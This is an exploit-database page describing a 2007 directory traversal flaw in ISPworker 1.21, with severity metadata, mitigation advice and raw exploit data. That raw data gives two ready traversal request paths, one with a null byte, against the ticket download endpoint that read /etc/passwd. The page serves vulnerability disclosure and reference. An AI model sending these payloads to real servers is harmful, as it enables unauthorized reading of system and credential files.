header-logo
Suggest Exploit
vendor:
ISPworker
by:
milw0rm.com
7.5
CVSS
HIGH
Remote File Disclosure
22
CWE
Product Name: ISPworker
Affected Version From: ISPworker 1.21
Affected Version To: ISPworker 1.21
Patch Exists: NO
Related CWE:
CPE: a:ispworker:ispworker:1.21
Metasploit:
Other Scripts:
Platforms Tested:
2007

ISPworker 1.21 Remote File Disclosure Vulnerability

This vulnerability allows an attacker to disclose sensitive files on the target system by exploiting the file disclosure vulnerability in ISPworker 1.21. By sending a specially crafted request to the /module/ticket/download.php endpoint with a manipulated ticketid or filename parameter, an attacker can traverse the directory structure and access files outside the intended scope. This can lead to the disclosure of sensitive information, such as the contents of the /etc/passwd file.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of ISPworker or apply a security fix provided by the vendor. Additionally, it is advisable to restrict access to the affected endpoint or implement proper input validation and sanitization to prevent directory traversal attacks.
Source

Exploit-DB raw data:

ISPworker 1.21 Remote File Disclosure Vulnerability
http://ispworker.de/_files/ispworker-1.21.tar.gz
/module/ticket/download.php?ticketid=../../../../../../../../../etc/passwd%00
/module/ticket/download.php?filename=../../../../../../../../../etc/passwd

# milw0rm.com [2007-10-31]

Navigation

Suggest Exploit

Services By CQR